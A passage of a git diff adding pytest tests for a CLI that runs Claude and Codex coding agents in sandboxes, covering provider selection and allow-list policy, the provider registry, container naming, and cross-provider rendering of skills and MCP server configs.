org_config=None, + project_config=None, + provider_id="claude", + ) + assert result["provider_id"] == "claude" + + def test_with_codex_provider_id(self, tmp_path: Path) -> None: + from scc_cli.commands.launch.render import build_dry_run_data + + result = build_dry_run_data( + workspace_path=tmp_path, + team=None, + org_config=None, + project_config=None, + provider_id="codex", + ) + assert result["provider_id"] == "codex" + + def test_without_provider_id(self, tmp_path: Path) -> None: + from scc_cli.commands.launch.render import build_dry_run_data + + result = build_dry_run_data( + workspace_path=tmp_path, + team=None, + org_config=None, + project_config=None, + ) + assert result["provider_id"] is None + + +class TestBuildSessionListDataProviderId: + """build_session_list_data includes provider_id.""" + + def test_with_provider_id(self) -> None: + from scc_cli.presentation.json.sessions_json import build_session_list_data + + result = build_session_list_data([], team="my-team", provider_id="claude") + assert result["provider_id"] == "claude" + assert result["team"] == "my-team" + assert result["count"] == 0 + + def test_without_provider_id(self) -> None: + from scc_cli.presentation.json.sessions_json import build_session_list_data + + result = build_session_list_data([{"id": "1"}], team="t") + assert result["provider_id"] is None + assert result["count"] == 1 + + def test_with_codex_provider_id(self) -> None: + from scc_cli.presentation.json.sessions_json import build_session_list_data + + result = build_session_list_data([], provider_id="codex") + assert result["provider_id"] == "codex" + + +class TestContainerNameProviderAware: + """_container_name includes provider_id in hash, producing different names per provider.""" + + def test_different_names_for_different_providers(self, tmp_path: Path) -> None: + from scc_cli.adapters.oci_sandbox_runtime import _container_name + + name_claude = _container_name(tmp_path, "claude") + name_codex = _container_name(tmp_path, "codex") + assert name_claude != name_codex + + def test_empty_provider_id_backward_compat(self, tmp_path: Path) -> None: + """Empty provider_id hashes just the workspace path (backward compat).""" + from scc_cli.adapters.oci_sandbox_runtime import _container_name + + expected_digest = hashlib.sha256(str(tmp_path).encode()).hexdigest()[:12] + expected = f"scc-oci-{expected_digest}" + assert _container_name(tmp_path) == expected + assert _container_name(tmp_path, "") == expected + + def test_provider_id_changes_hash(self, tmp_path: Path) -> None: + from scc_cli.adapters.oci_sandbox_runtime import _container_name + + name_default = _container_name(tmp_path) + name_with_provider = _container_name(tmp_path, "claude") + assert name_default != name_with_provider + + def test_deterministic(self, tmp_path: Path) -> None: + from scc_cli.adapters.oci_sandbox_runtime import _container_name + + assert _container_name(tmp_path, "claude") == _container_name(tmp_path, "claude") + + def test_hash_format(self, tmp_path: Path) -> None: + from scc_cli.adapters.oci_sandbox_runtime import _container_name + + name = _container_name(tmp_path, "codex") + assert name.startswith("scc-oci-") + assert len(name) == len("scc-oci-") + 12 + + +class TestSandboxSpecProviderId: + """SandboxSpec gains provider_id field.""" + + def test_default_empty(self) -> None: + from scc_cli.ports.models import MountSpec, SandboxSpec + + spec = SandboxSpec( + image="test:latest", + workspace_mount=MountSpec(source=Path("/ws"), target=Path("/ws")), + workdir=Path("/ws"), + ) + assert spec.provider_id == "" + + def test_explicit_provider_id(self) -> None: + from scc_cli.ports.models import MountSpec, SandboxSpec + + spec = SandboxSpec( + image="test:latest", + workspace_mount=MountSpec(source=Path("/ws"), target=Path("/ws")), + workdir=Path("/ws"), + provider_id="codex", + ) + assert spec.provider_id == "codex" + + +class TestSupportBundleManifestProviderId: + """Support bundle manifest includes provider_id.""" + + def test_provider_id_in_manifest(self, tmp_path: Path) -> None: + from scc_cli.application.support_bundle import ( + SupportBundleDependencies, + SupportBundleRequest, + build_support_bundle_manifest, + ) + + mock_fs = MagicMock() + mock_fs.exists.return_value = False + + mock_clock = MagicMock() + mock_clock.now.return_value = MagicMock(isoformat=lambda: "2025-01-01T00:00:00") + + mock_doctor = MagicMock() + mock_doctor.run.side_effect = Exception("skip") + + mock_archive = MagicMock() + + deps = SupportBundleDependencies( + filesystem=mock_fs, + clock=mock_clock, + doctor_runner=mock_doctor, + archive_writer=mock_archive, + ) + + request = SupportBundleRequest( + output_path=tmp_path / "bundle.zip", + redact_paths=False, + workspace_path=tmp_path, + ) + + with patch( + "scc_cli.application.support_bundle.config.get_selected_provider", + return_value="claude", + ): + manifest = build_support_bundle_manifest(request, dependencies=deps) + + assert "provider_id" in manifest + assert manifest["provider_id"] == "claude" + + def test_provider_id_none_when_unset(self, tmp_path: Path) -> None: + from scc_cli.application.support_bundle import ( + SupportBundleDependencies, + SupportBundleRequest, + build_support_bundle_manifest, + ) + + mock_fs = MagicMock() + mock_fs.exists.return_value = False + + mock_clock = MagicMock() + mock_clock.now.return_value = MagicMock(isoformat=lambda: "2025-01-01T00:00:00") + + mock_doctor = MagicMock() + mock_doctor.run.side_effect = Exception("skip") + + mock_archive = MagicMock() + + deps = SupportBundleDependencies( + filesystem=mock_fs, + clock=mock_clock, + doctor_runner=mock_doctor, + archive_writer=mock_archive, + ) + + request = SupportBundleRequest( + output_path=tmp_path / "bundle.zip", + redact_paths=False, + workspace_path=tmp_path, + ) + + with patch( + "scc_cli.application.support_bundle.config.get_selected_provider", + return_value=None, + ): + manifest = build_support_bundle_manifest(request, dependencies=deps) + + assert manifest["provider_id"] is None + + +class TestBuildSandboxSpecPopulatesProviderId: + """_build_sandbox_spec populates provider_id from the provider adapter.""" + + def _make_resolver_result(self) -> Any: + from scc_cli.core.workspace import ResolverResult + + return ResolverResult( + workspace_root=Path("/ws"), + mount_root=Path("/ws"), + entry_dir=Path("/ws"), + container_workdir="/ws", + is_auto_detected=False, + is_suspicious=False, + ) + + def test_oci_backend_with_provider(self) -> None: + from scc_cli.application.start_session import StartSessionRequest, _build_sandbox_spec + from scc_cli.core.contracts import RuntimeInfo + + mock_provider = MagicMock() + mock_provider.capability_profile.return_value = MagicMock( + provider_id="codex", + required_destination_set="codex-api", + ) + + request = StartSessionRequest( + workspace_path=Path("/ws"), + workspace_arg="/ws", + entry_dir=Path("/ws"), + team=None, + session_name=None, + resume=False, + fresh=False, + offline=False, + standalone=False, + dry_run=False, + allow_suspicious=False, + org_config=None, + provider_id="codex", + ) + + runtime_info = RuntimeInfo( + runtime_id="docker", + display_name="Docker", + cli_name="docker", + supports_oci=True, + supports_internal_networks=True, + supports_host_network=True, + preferred_backend="oci", + ) + + with patch( + "scc_cli.application.start_session.resolve_destination_sets", + return_value=(), + ): + spec = _build_sandbox_spec( + request=request, + resolver_result=self._make_resolver_result(), + effective_config=None, + agent_settings=None, + runtime_info=runtime_info, + agent_provider=mock_provider, + ) + + assert spec is not None + assert spec.provider_id == "codex" + + def test_non_oci_backend_with_provider(self) -> None: + from scc_cli.application.start_session import StartSessionRequest, _build_sandbox_spec + + mock_provider = MagicMock() + mock_provider.capability_profile.return_value = MagicMock( + provider_id="claude", + required_destination_set=None, + ) + + request = StartSessionRequest( + workspace_path=Path("/ws"), + workspace_arg="/ws", + entry_dir=Path("/ws"), + team=None, + session_name=None, + resume=False, + fresh=False, + offline=False, + standalone=False, + dry_run=False, + allow_suspicious=False, + org_config=None, + provider_id="claude", + ) + + spec = _build_sandbox_spec( + request=request, + resolver_result=self._make_resolver_result(), + effective_config=None, + agent_settings=None, + runtime_info=None, + agent_provider=mock_provider, + ) + + assert spec is not None + assert spec.provider_id == "claude" + + def test_no_provider_defaults_empty(self) -> None: + from scc_cli.application.start_session import StartSessionRequest, _build_sandbox_spec + + request = StartSessionRequest( + workspace_path=Path("/ws"), + workspace_arg="/ws", + entry_dir=Path("/ws"), + team=None, + session_name=None, + resume=False, + fresh=False, + offline=False, + standalone=False, + dry_run=False, + allow_suspicious=False, + org_config=None, + ) + + spec = _build_sandbox_spec( + request=request, + resolver_result=self._make_resolver_result(), + effective_config=None, + agent_settings=None, + ) + + assert spec is not None + assert spec.provider_id == "" diff --git a/tests/test_provider_registry.py b/tests/test_provider_registry.py new file mode 100644 index 0000000..8ba5535 --- /dev/null +++ b/tests/test_provider_registry.py @@ -0,0 +1,131 @@ +"""Tests for the canonical provider runtime registry.""" + +from __future__ import annotations + +import pytest + +from scc_cli.core.contracts import ProviderRuntimeSpec +from scc_cli.core.errors import InvalidProviderError +from scc_cli.core.image_contracts import SCC_CLAUDE_IMAGE_REF, SCC_CODEX_IMAGE_REF +from scc_cli.core.provider_registry import PROVIDER_REGISTRY, get_runtime_spec +from scc_cli.core.provider_resolution import KNOWN_PROVIDERS + +# ── Claude spec ────────────────────────────────────────────────────────── + + +class TestClaudeSpec: + def test_claude_spec_returns_correct_fields(self) -> None: + spec = get_runtime_spec("claude") + assert isinstance(spec, ProviderRuntimeSpec) + assert spec.provider_id == "claude" + assert spec.display_name == "Claude Code" + assert spec.image_ref == SCC_CLAUDE_IMAGE_REF + assert spec.config_dir == ".claude" + assert spec.settings_path == ".claude/settings.json" + assert spec.settings_scope == "home" + assert spec.data_volume == "docker-claude-sandbox-data" + + +# ── D041: settings_scope layering ──────────────────────────────────────── + + +class TestSettingsScopeLayering: + """D041: Claude config is home-scoped, Codex config is workspace-scoped.""" + + def test_claude_settings_scope_is_home(self) -> None: + """Claude settings go under /home/agent (user-level config).""" + spec = get_runtime_spec("claude") + assert spec.settings_scope == "home" + + def test_codex_settings_scope_is_workspace(self) -> None: + """Codex settings go to workspace mount (project-scoped, per D041).""" + spec = get_runtime_spec("codex") + assert spec.settings_scope == "workspace" + + def test_all_providers_have_valid_scope(self) -> None: + """Every provider in the registry must declare a valid settings_scope.""" + for pid, spec in PROVIDER_REGISTRY.items(): + assert spec.settings_scope in ("home", "workspace"), ( + f"{pid}: settings_scope={spec.settings_scope!r} not in (home, workspace)" + ) + + +# ── Codex spec ─────────────────────────────────────────────────────────── + + +class TestCodexSpec: + def test_codex_spec_returns_correct_fields(self) -> None: + spec = get_runtime_spec("codex") + assert isinstance(spec, ProviderRuntimeSpec) + assert spec.provider_id == "codex" + assert spec.display_name == "Codex" + assert spec.image_ref == SCC_CODEX_IMAGE_REF + assert spec.config_dir == ".codex" + assert spec.settings_path == ".codex/config.toml" + assert spec.settings_scope == "workspace" + assert spec.data_volume == "docker-codex-sandbox-data" + + +# ── Fail-closed lookup ────────────────────────────────────────────────── + + +class TestFailClosed: + def test_unknown_provider_raises_invalid_provider_error(self) -> None: + with pytest.raises(InvalidProviderError) as exc_info: + get_runtime_spec("gemini") + err = exc_info.value + assert err.provider_id == "gemini" + assert set(err.known_providers) == {"claude", "codex"} + + def test_empty_string_provider_raises(self) -> None: + with pytest.raises(InvalidProviderError) as exc_info: + get_runtime_spec("") + assert exc_info.value.provider_id == "" + + def test_invalid_provider_error_message_includes_known_providers(self) -> None: + with pytest.raises(InvalidProviderError) as exc_info: + get_runtime_spec("unknown-agent") + err = exc_info.value + assert "unknown-agent" in err.user_message + assert "claude" in err.user_message + assert "codex" in err.user_message + + def test_invalid_provider_error_suggested_action(self) -> None: + with pytest.raises(InvalidProviderError) as exc_info: + get_runtime_spec("nope") + err = exc_info.value + assert "claude" in err.suggested_action + assert "codex" in err.suggested_action + + +# ── Registry integrity ────────────────────────────────────────────────── + + +class TestRegistryIntegrity: + def test_all_registry_fields_are_nonempty(self) -> None: + for pid, spec in PROVIDER_REGISTRY.items(): + assert spec.provider_id, f"{pid}: provider_id is empty" + assert spec.display_name, f"{pid}: display_name is empty" + assert spec.image_ref, f"{pid}: image_ref is empty" + assert spec.config_dir, f"{pid}: config_dir is empty" + assert spec.settings_path, f"{pid}: settings_path is empty" + assert spec.data_volume, f"{pid}: data_volume is empty" + + def test_registry_keys_match_known_providers(self) -> None: + """Guardrail: registry stays in sync with KNOWN_PROVIDERS.""" + assert set(PROVIDER_REGISTRY.keys()) == set(KNOWN_PROVIDERS) + + def test_different_providers_have_different_volumes(self) -> None: + """Coexistence safety: volumes must not collide.""" + volumes = [spec.data_volume for spec in PROVIDER_REGISTRY.values()] + assert len(volumes) == len(set(volumes)) + + def test_different_providers_have_different_config_dirs(self) -> None: + """Coexistence safety: config dirs must not collide.""" + dirs = [spec.config_dir for spec in PROVIDER_REGISTRY.values()] + assert len(dirs) == len(set(dirs)) + + def test_spec_is_frozen(self) -> None: + spec = get_runtime_spec("claude") + with pytest.raises(AttributeError): + spec.provider_id = "hacked" # type: ignore[misc] diff --git a/tests/test_provider_resolution.py b/tests/test_provider_resolution.py new file mode 100644 index 0000000..907f623 --- /dev/null +++ b/tests/test_provider_resolution.py @@ -0,0 +1,204 @@ +"""Tests for provider resolution and config helpers.""" + +from __future__ import annotations + +import json +from pathlib import Path + +import pytest + +from scc_cli.core.errors import ProviderNotAllowedError +from scc_cli.core.provider_resolution import ( + KNOWN_PROVIDERS, + resolve_active_provider, +) + +# ═══════════════════════════════════════════════════════════════════════════════ +# resolve_active_provider +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestResolveActiveProvider: + """Tests for the pure resolver function.""" + + def test_default_resolution_returns_claude(self) -> None: + assert resolve_active_provider(None, None) == "claude" + + def test_cli_flag_overrides_default(self) -> None: + assert resolve_active_provider("codex", None) == "codex" + + def test_config_overrides_default(self) -> None: + assert resolve_active_provider(None, "codex") == "codex" + + def test_cli_flag_beats_config(self) -> None: + assert resolve_active_provider("claude", "codex") == "claude" + + def test_unknown_provider_raises_value_error(self) -> None: + with pytest.raises(ValueError, match="Unknown provider 'fake'"): + resolve_active_provider("fake", None) + + def test_unknown_config_provider_raises_value_error(self) -> None: + with pytest.raises(ValueError, match="Unknown provider 'nope'"): + resolve_active_provider(None, "nope") + + def test_allowed_providers_empty_means_all_allowed(self) -> None: + # Empty tuple = no restriction + assert resolve_active_provider("codex", None, allowed_providers=()) == "codex" + + def test_provider_in_allowed_list_passes(self) -> None: + assert resolve_active_provider("claude", None, allowed_providers=("claude",)) == "claude" + + def test_provider_not_in_allowed_list_raises(self) -> None: + with pytest.raises(ProviderNotAllowedError) as exc_info: + resolve_active_provider("codex", None, allowed_providers=("claude",)) + err = exc_info.value + assert err.provider_id == "codex" + assert err.allowed_providers == ("claude",) + assert "codex" in err.user_message + assert "claude" in err.user_message + + def test_config_provider_blocked_by_policy(self) -> None: + with pytest.raises(ProviderNotAllowedError): + resolve_active_provider(None, "codex", allowed_providers=("claude",)) + + def test_ask_config_provider_falls_back_to_default(self) -> None: + assert resolve_active_provider(None, "ask") == "claude" + + def test_known_providers_contains_claude_and_codex(self) -> None: + assert "claude" in KNOWN_PROVIDERS + assert "codex" in KNOWN_PROVIDERS + + +# ═══════════════════════════════════════════════════════════════════════════════ +# ProviderNotAllowedError +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestProviderNotAllowedError: + """Tests for the error type itself.""" + + def test_auto_generated_user_message(self) -> None: + err = ProviderNotAllowedError( + provider_id="codex", + allowed_providers=("claude",), + ) + assert "codex" in err.user_message + assert "claude" in err.user_message + + def test_auto_generated_suggested_action(self) -> None: + err = ProviderNotAllowedError( + provider_id="codex", + allowed_providers=("claude",), + ) + assert "allowed providers" in err.suggested_action.lower() + + def test_custom_message_preserved(self) -> None: + err = ProviderNotAllowedError( + provider_id="codex", + allowed_providers=("claude",), + user_message="Custom message", + ) + assert err.user_message == "Custom message" + + +# ═══════════════════════════════════════════════════════════════════════════════ +# Config helpers: get_selected_provider / set_selected_provider +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestProviderConfigHelpers: + """Tests for selected_provider config persistence.""" + + def test_get_selected_provider_returns_none_by_default( + self, tmp_path: Path, monkeypatch: pytest.MonkeyPatch + ) -> None: + from scc_cli import config as config_mod + + config_dir = tmp_path / ".config" / "scc" + config_dir.mkdir(parents=True) + monkeypatch.setattr(config_mod, "CONFIG_DIR", config_dir) + monkeypatch.setattr(config_mod, "CONFIG_FILE", config_dir / "config.json") + + assert config_mod.get_selected_provider() is None + + def test_set_and_get_selected_provider( + self, tmp_path: Path, monkeypatch: pytest.MonkeyPatch + ) -> None: + from scc_cli import config as config_mod + + config_dir = tmp_path / ".config" / "scc" + config_dir.mkdir(parents=True) + config_file = config_dir / "config.json" + monkeypatch.setattr(config_mod, "CONFIG_DIR", config_dir) + monkeypatch.setattr(config_mod, "CONFIG_FILE", config_file) + + config_mod.set_selected_provider("codex") + assert config_mod.get_selected_provider() == "codex" + + # Verify it's actually on disk + on_disk = json.loads(config_file.read_text()) + assert on_disk["selected_provider"] == "codex" + + def test_set_and_get_selected_provider_ask( + self, tmp_path: Path, monkeypatch: pytest.MonkeyPatch + ) -> None: + from scc_cli import config as config_mod + + config_dir = tmp_path / ".config" / "scc" + config_dir.mkdir(parents=True) + config_file = config_dir / "config.json" + monkeypatch.setattr(config_mod, "CONFIG_DIR", config_dir) + monkeypatch.setattr(config_mod, "CONFIG_FILE", config_file) + + config_mod.set_selected_provider("ask") + assert config_mod.get_selected_provider() == "ask" + + on_disk = json.loads(config_file.read_text()) + assert on_disk["selected_provider"] == "ask" + + def test_set_provider_preserves_other_config( + self, tmp_path: Path, monkeypatch: pytest.MonkeyPatch + ) -> None: + from scc_cli import config as config_mod + + config_dir = tmp_path / ".config" / "scc" + config_dir.mkdir(parents=True) + config_file = config_dir / "config.json" + # Pre-populate config with a profile + config_file.write_text(json.dumps({"selected_profile": "my-team"})) + + monkeypatch.setattr(config_mod, "CONFIG_DIR", config_dir) + monkeypatch.setattr(config_mod, "CONFIG_FILE", config_file) + + config_mod.set_selected_provider("codex") + + on_disk = json.loads(config_file.read_text()) + assert on_disk["selected_provider"] == "codex" + assert on_disk["selected_profile"] == "my-team" + + def test_selected_provider_in_defaults(self) -> None: + from scc_cli.config import USER_CONFIG_DEFAULTS + + assert "selected_provider" in USER_CONFIG_DEFAULTS + assert USER_CONFIG_DEFAULTS["selected_provider"] is None + + +# ═══════════════════════════════════════════════════════════════════════════════ +# NormalizedTeamConfig.allowed_providers field +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestNormalizedTeamConfigAllowedProviders: + """Tests for the allowed_providers field on NormalizedTeamConfig.""" + + def test_default_is_empty_tuple(self) -> None: + from scc_cli.ports.config_models import NormalizedTeamConfig + + cfg = NormalizedTeamConfig(name="test-team") + assert cfg.allowed_providers == () + + def test_can_set_allowed_providers(self) -> None: + from scc_cli.ports.config_models import NormalizedTeamConfig + + cfg = NormalizedTeamConfig(name="test-team", allowed_providers=("claude",)) + assert cfg.allowed_providers == ("claude",) diff --git a/tests/test_provider_selection_policy.py b/tests/test_provider_selection_policy.py new file mode 100644 index 0000000..fc98766 --- /dev/null +++ b/tests/test_provider_selection_policy.py @@ -0,0 +1,96 @@ +"""Pure tests for provider selection precedence.""" + +from __future__ import annotations + +import pytest + +from scc_cli.application.provider_selection import ( + ProviderSelection, + resolve_provider_preference, +) +from scc_cli.core.errors import ProviderNotAllowedError + + +def test_explicit_provider_wins() -> None: + result = resolve_provider_preference( + cli_flag="codex", + resume_provider="claude", + workspace_last_used="claude", + global_preferred="claude", + ) + assert result == ProviderSelection(provider_id="codex", source="explicit") + + +def test_resume_provider_beats_workspace_and_global() -> None: + result = resolve_provider_preference( + cli_flag=None, + resume_provider="codex", + workspace_last_used="claude", + global_preferred="claude", + ) + assert result == ProviderSelection(provider_id="codex", source="resume") + + +def test_workspace_last_used_beats_global_preference() -> None: + result = resolve_provider_preference( + cli_flag=None, + resume_provider=None, + workspace_last_used="codex", + global_preferred="claude", + ) + assert result == ProviderSelection(provider_id="codex", source="workspace_last_used") + + +def test_global_preference_used_when_no_higher_precedence_exists() -> None: + result = resolve_provider_preference( + cli_flag=None, + resume_provider=None, + workspace_last_used=None, + global_preferred="codex", + ) + assert result == ProviderSelection(provider_id="codex", source="global_preferred") + + +def test_ask_global_preference_returns_none() -> None: + assert ( + resolve_provider_preference( + cli_flag=None, + resume_provider=None, + workspace_last_used=None, + global_preferred="ask", + ) + is None + ) + + +def test_explicit_ask_preference_suppresses_workspace_last_used() -> None: + assert ( + resolve_provider_preference( + cli_flag=None, + resume_provider=None, + workspace_last_used="codex", + global_preferred="ask", + ) + is None + ) + + +def test_allowed_providers_policy_still_applies() -> None: + with pytest.raises(ProviderNotAllowedError): + resolve_provider_preference( + cli_flag=None, + resume_provider=None, + workspace_last_used="codex", + global_preferred=None, + allowed_providers=("claude",), + ) + + +def test_unknown_provider_raises_value_error() -> None: + with pytest.raises(ValueError, match="Unknown provider 'nope'"): + resolve_provider_preference( + cli_flag=None, + resume_provider=None, + workspace_last_used="nope", + global_preferred=None, + ) diff --git a/tests/test_quick_resume_behavior.py b/tests/test_quick_resume_behavior.py index f2017aa..47a871a 100644 --- a/tests/test_quick_resume_behavior.py +++ b/tests/test_quick_resume_behavior.py @@ -19,10 +19,15 @@ def test_quick_resume_shows_active_team_in_header() -> None: ) with ( - patch("scc_cli.commands.launch.flow.config.is_standalone_mode", return_value=False), - patch("scc_cli.commands.launch.flow.config.load_cached_org_config", return_value={}), - patch("scc_cli.commands.launch.flow.teams.list_teams", return_value=[]), - patch("scc_cli.commands.launch.flow.load_recent_contexts", return_value=[context]), + patch( + "scc_cli.commands.launch.flow_interactive.config.is_standalone_mode", return_value=False + ), + patch( + "scc_cli.commands.launch.flow_interactive.config.load_cached_org_config", + return_value={}, + ), + patch("scc_cli.commands.launch.flow_interactive.teams.list_teams", return_value=[]), + patch("scc_cli.commands.launch.wizard_resume.load_recent_contexts", return_value=[context]), patch("scc_cli.ui.wizard.pick_context_quick_resume") as mock_picker, ): mock_picker.side_effect = RuntimeError("stop") @@ -47,10 +52,15 @@ def test_quick_resume_back_cancels_at_top_level() -> None: ) with ( - patch("scc_cli.commands.launch.flow.config.is_standalone_mode", return_value=False), - patch("scc_cli.commands.launch.flow.config.load_cached_org_config", return_value={}), - patch("scc_cli.commands.launch.flow.teams.list_teams", return_value=[]), - patch("scc_cli.commands.launch.flow.load_recent_contexts", return_value=[context]), + patch( + "scc_cli.commands.launch.flow_interactive.config.is_standalone_mode", return_value=False + ), + patch( + "scc_cli.commands.launch.flow_interactive.config.load_cached_org_config", + return_value={}, + ), + patch("scc_cli.commands.launch.flow_interactive.teams.list_teams", return_value=[]), + patch("scc_cli.commands.launch.wizard_resume.load_recent_contexts", return_value=[context]), patch( "scc_cli.ui.wizard.pick_context_quick_resume", return_value=(QuickResumeResult.BACK, None), diff --git a/tests/test_render_pipeline_integration.py b/tests/test_render_pipeline_integration.py new file mode 100644 index 0000000..79759c4 --- /dev/null +++ b/tests/test_render_pipeline_integration.py @@ -0,0 +1,1141 @@ +"""Cross-provider render plan equivalence and pipeline integration tests. + +Exercises the full planning→rendering pipeline: + NormalizedOrgConfig → resolve_render_plan → render_*_artifacts → verify + +1. Same org config + same team → same shared artifacts (skills, MCP) in both plans +2. Provider-specific bindings appear only for the matching provider +3. Switching provider re-renders from same plan, produces different native outputs +4. End-to-end: NormalizedOrgConfig → resolve → render → verify file outputs +5. Backward compatibility: teams without governed_artifacts → empty plans, no error +6. Pipeline seam: bundle_resolver + renderer boundary contracts verified +""" + +from __future__ import annotations + +import json +from pathlib import Path + +import pytest + +from scc_cli.adapters.claude_renderer import ( + SCC_MANAGED_DIR as CLAUDE_SCC_DIR, +) +from scc_cli.adapters.claude_renderer import ( + render_claude_artifacts, +) +from scc_cli.adapters.codex_renderer import ( + SKILLS_DIR as CODEX_SKILLS_DIR, +) +from scc_cli.adapters.codex_renderer import ( + render_codex_artifacts, +) +from scc_cli.core.bundle_resolver import ( + BundleResolutionResult, + resolve_render_plan, +) +from scc_cli.core.governed_artifacts import ( + ArtifactBundle, + ArtifactInstallIntent, + ArtifactKind, + ArtifactRenderPlan, + GovernedArtifact, + ProviderArtifactBinding, +) +from scc_cli.ports.config_models import ( + GovernedArtifactsCatalog, + NormalizedOrgConfig, + NormalizedTeamConfig, + OrganizationInfo, +) + +# --------------------------------------------------------------------------- +# Factory helpers +# --------------------------------------------------------------------------- + + +def _org( + *, + profiles: dict[str, NormalizedTeamConfig] | None = None, + catalog: GovernedArtifactsCatalog | None = None, +) -> NormalizedOrgConfig: + return NormalizedOrgConfig( + organization=OrganizationInfo(name="integration-test-org"), + profiles=profiles or {}, + governed_artifacts=catalog or GovernedArtifactsCatalog(), + ) + + +def _team(name: str, bundles: tuple[str, ...] = ()) -> NormalizedTeamConfig: + return NormalizedTeamConfig(name=name, enabled_bundles=bundles) + + +def _skill( + name: str, + intent: ArtifactInstallIntent = ArtifactInstallIntent.REQUIRED, +) -> GovernedArtifact: + return GovernedArtifact(kind=ArtifactKind.SKILL, name=name, install_intent=intent) + + +def _mcp( + name: str, + intent: ArtifactInstallIntent = ArtifactInstallIntent.REQUIRED, +) -> GovernedArtifact: + return GovernedArtifact(kind=ArtifactKind.MCP_SERVER, name=name, install_intent=intent) + + +def _native( + name: str, + intent: ArtifactInstallIntent = ArtifactInstallIntent.AVAILABLE, +) -> GovernedArtifact: + return GovernedArtifact(kind=ArtifactKind.NATIVE_INTEGRATION, name=name, install_intent=intent) + + +# --------------------------------------------------------------------------- +# Shared realistic catalog — skills + MCP + provider-specific natives +# --------------------------------------------------------------------------- + +_SHARED_CATALOG = GovernedArtifactsCatalog( + artifacts={ + "review-skill": _skill("review-skill"), + "lint-skill": _skill("lint-skill"), + "github-mcp": _mcp("github-mcp"), + "slack-mcp": _mcp("slack-mcp"), + "claude-hooks": _native("claude-hooks"), + "codex-rules": _native("codex-rules"), + }, + bindings={ + # Shared skill — both providers + "review-skill": ( + ProviderArtifactBinding(provider="claude", native_ref="skills/review"), + ProviderArtifactBinding(provider="codex", native_ref="skills/review"), + ), + # Shared skill — both providers + "lint-skill": ( + ProviderArtifactBinding(provider="claude", native_ref="skills/lint"), + ProviderArtifactBinding(provider="codex", native_ref="skills/lint"), + ), + # Shared MCP — both providers via SSE + "github-mcp": ( + ProviderArtifactBinding( + provider="claude", + native_ref="mcp/github", + transport_type="sse", + native_config={"url": "http://github-mcp:8080/sse"}, + ), + ProviderArtifactBinding( + provider="codex", + native_ref="mcp/github", + transport_type="sse", + native_config={"url": "http://github-mcp:8080/sse"}, + ), + ), + # Shared MCP — both providers via stdio + "slack-mcp": ( + ProviderArtifactBinding( + provider="claude", + native_ref="mcp/slack", + transport_type="stdio", + native_config={"command": "slack-mcp-server", "args": "--port 9090"}, + ), + ProviderArtifactBinding( + provider="codex", + native_ref="mcp/slack", + transport_type="stdio", + native_config={"command": "slack-mcp-server", "args": "--port 9090"}, + ), + ), + # Claude-only native integration + "claude-hooks": ( + ProviderArtifactBinding( + provider="claude", + native_config={"hooks": "./claude/hooks.json"}, + ), + ), + # Codex-only native integration + "codex-rules": ( + ProviderArtifactBinding( + provider="codex", + native_config={"rules": "./codex/safety.rules"}, + ), + ), + }, + bundles={ + "core-tools": ArtifactBundle( + name="core-tools", + description="Shared skills and MCP servers", + artifacts=("review-skill", "lint-skill", "github-mcp", "slack-mcp"), + ), + "provider-native": ArtifactBundle( + name="provider-native", + description="Provider-specific native integrations", + artifacts=("claude-hooks", "codex-rules"), + ), + "mixed-bundle": ArtifactBundle( + name="mixed-bundle", + description="Skills + MCP + natives", + artifacts=( + "review-skill", + "github-mcp", + "claude-hooks", + "codex-rules", + ), + ), + }, +) + + +@pytest.fixture() +def workspace(tmp_path: Path) -> Path: + """Fresh temporary workspace for renderer output.""" + return tmp_path + + +# ═══════════════════════════════════════════════════════════════════════════ +# 1. Shared artifacts appear in both providers' plans +# ═══════════════════════════════════════════════════════════════════════════ + + +class TestSharedArtifactsInBothPlans: + """Same org config + same team → same shared artifacts in both plans.""" + + def _resolve_both(self) -> tuple[BundleResolutionResult, BundleResolutionResult]: + org = _org( + profiles={"dev": _team("dev", bundles=("core-tools",))}, + catalog=_SHARED_CATALOG, + ) + claude_result = resolve_render_plan(org, "dev", "claude") + codex_result = resolve_render_plan(org, "dev", "codex") + return claude_result, codex_result + + def test_both_providers_produce_one_plan(self) -> None: + claude_r, codex_r = self._resolve_both() + assert len(claude_r.plans) == 1 + assert len(codex_r.plans) == 1 + + def test_shared_skills_in_both_effective_artifacts(self) -> None: + claude_r, codex_r = self._resolve_both() + claude_eff = claude_r.plans[0].effective_artifacts + codex_eff = codex_r.plans[0].effective_artifacts + # Skills and MCP are shared + for art in ("review-skill", "lint-skill", "github-mcp", "slack-mcp"): + assert art in claude_eff, f"{art} missing from Claude effective_artifacts" + assert art in codex_eff, f"{art} missing from Codex effective_artifacts" + + def test_effective_artifact_sets_identical(self) -> None: + claude_r, codex_r = self._resolve_both() + assert set(claude_r.plans[0].effective_artifacts) == set( + codex_r.plans[0].effective_artifacts + ) + + def test_no_diagnostics_for_shared_bundle(self) -> None: + claude_r, codex_r = self._resolve_both() + assert len(claude_r.diagnostics) == 0 + assert len(codex_r.diagnostics) == 0 + + def test_bindings_are_provider_filtered(self) -> None: + """Each plan only contains bindings for its target provider.""" + claude_r, codex_r = self._resolve_both() + for b in claude_r.plans[0].bindings: + assert b.provider == "claude" + for b in codex_r.plans[0].bindings: + assert b.provider == "codex" + + +# ═══════════════════════════════════════════════════════════════════════════ +# 2. Provider-specific bindings appear only for matching provider +# ═══════════════════════════════════════════════════════════════════════════ + + +class TestProviderSpecificBindingsFiltered: + """Native integrations with single-provider bindings are routed correctly.""" + + def _resolve_both(self) -> tuple[BundleResolutionResult, BundleResolutionResult]: + org = _org( + profiles={"dev": _team("dev", bundles=("provider-native",))}, + catalog=_SHARED_CATALOG, + ) + return ( + resolve_render_plan(org, "dev", "claude"), + resolve_render_plan(org, "dev", "codex"), + ) + + def test_claude_hooks_in_claude_plan_only(self) -> None: + claude_r, codex_r = self._resolve_both() + assert "claude-hooks" in claude_r.plans[0].effective_artifacts + assert "claude-hooks" not in codex_r.plans[0].effective_artifacts + + def test_codex_rules_in_codex_plan_only(self) -> None: + claude_r, codex_r = self._resolve_both() + assert "codex-rules" not in claude_r.plans[0].effective_artifacts + assert "codex-rules" in codex_r.plans[0].effective_artifacts + + def test_claude_hooks_skipped_in_codex_with_diagnostic(self) -> None: + _, codex_r = self._resolve_both() + assert "claude-hooks" in codex_r.plans[0].skipped + diag_names = {d.artifact_name for d in codex_r.diagnostics} + assert "claude-hooks" in diag_names + + def 